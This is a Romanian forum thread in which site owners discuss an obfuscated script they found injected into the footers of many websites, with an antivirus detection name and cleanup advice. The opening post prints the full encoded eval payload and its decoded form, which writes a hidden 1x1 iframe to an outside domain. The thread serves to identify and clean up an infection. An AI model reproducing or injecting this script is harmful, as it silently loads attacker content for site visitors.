paxnWo Posted April 21, 2010 Report Posted April 21, 2010 azi am dat peste al 6-lea site pe saptamana asta care are inserat in footer: <script>eval(unescape('%65%76%61%6C%28%66%75%6E%63%74%69%6F%6E%28%75%45%75%2C%78%55%6F%2C%45%4E%62%56%2C%61%4C%2C%71%6D%2C%49%4A%29%7B%71%6D%3D%53%74%72%69%6E%67%3B%69%66%28%21%27%27%2E%72%65%70%6C%61%63%65%28%2F%5E%2F%2C%53%74%72%69%6E%67%29%29%7B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%49%4A%5B%45%4E%62%56%5D%3D%61%4C%5B%45%4E%62%56%5D%7C%7C%45%4E%62%56%3B%61%4C%3D%5B%66%75%6E%63%74%69%6F%6E%28%71%6D%29%7B%72%65%74%75%72%6E%20%49%4A%5B%71%6D%5D%7D%5D%3B%71%6D%3D%66%75%6E%63%74%69%6F%6E%28%29%7B%72%65%74%75%72%6E%27%5C%5C%77%2B%27%7D%3B%45%4E%62%56%3D%31%7D%3B%77%68%69%6C%65%28%45%4E%62%56%2D%2D%29%69%66%28%61%4C%5B%45%4E%62%56%5D%29%75%45%75%3D%75%45%75%2E%72%65%70%6C%61%63%65%28%6E%65%77%20%52%65%67%45%78%70%28%27%5C%5C%62%27%2B%71%6D%28%45%4E%62%56%29%2B%27%5C%5C%62%27%2C%27%67%27%29%2C%61%4C%5B%45%4E%62%56%5D%29%3B%72%65%74%75%72%6E%20%75%45%75%7D%28%27%35%2E%32%28%22%3C%38%20%37%3D%5C%5C%22%36%3A%2F%2F%34%2E%30%2F%5C%5C%22%20%33%3D%31%20%39%3D%31%3E%22%29%3B%27%2C%31%30%2C%31%30%2C%27%63%6F%6D%7C%7C%77%72%69%74%65%7C%77%69%64%74%68%7C%68%65%72%74%79%62%61%78%79%7C%64%6F%63%75%6D%65%6E%74%7C%68%74%74%70%7C%73%72%63%7C%69%66%72%61%6D%65%7C%68%65%69%67%68%74%27%2E%73%70%6C%69%74%28%27%7C%27%29%2C%30%2C%7B%7D%29%29'));</script><!-- uy7gdr5kmn -->site-urile nu au nicio legatura intre ele, doar ca sunt din ro. toate au commentul " uy7gdr5kmn ". hexul de mai sus decriptat: eval(function(uEu,xUo,ENbV,aL,qm,IJ){qm=String;if(!''.replace(/^/,String)){while(ENbV--)IJ[ENbV]=aL[ENbV]||ENbV;aL=[function(qm){return IJ[qm]}];qm=function(){return'\\w+'};ENbV=1};while(ENbV--)if(aL[ENbV])uEu=uEu.replace(new RegExp('\\b'+qm(ENbV)+'\\b','g'),aL[ENbV]);return uEu}('5.2("<8 7=\\"6://4.0/\\" 3=1 9=1>");',10,10,'com||write|width|hertybaxy|document|http|src|iframe|height'.split('|'),0,{}))iframe catre hertybaxy.compana si un html de-al meu a fost infectat cu asta, era singurul de pe host, nu se pune problema ca ar fi luat cineva acces la el. dubios. oricum, autorii scot o gramada de bani. Quote
linux_terminal Posted April 21, 2010 Report Posted April 21, 2010 (edited) E interesant pentru ca si eu mam gandit la unu asemanator, e bine ca e inofensiv:)Kaspersky mi la gasit ca find:: Trojan-Clicker.JS.Iframe.fcSi fara antivirus:: Windows 7C:\WINDOWS\system32\SEARCHPROTOCOLHOST.EXE Edited April 22, 2010 by linux_terminal Quote
Fitty Posted April 22, 2010 Report Posted April 22, 2010 Si mie mi s-a intamplat, pe mai multe hosturi. Dar macar eu nu ma alarmez si ma pis pe ele.@linux_terminal: Windows user? )) Quote
loki Posted April 22, 2010 Report Posted April 22, 2010 astea iti infecteaza toate fisierele html php pe care le gaseste. Tre sa scanezi tot pe acolo. Am patit-o acasa candva si mai tarziu pe awardspace da acolo nu m-am prins pe unde a intrat, nu aveam nimic care sa permita scrieri. Quote
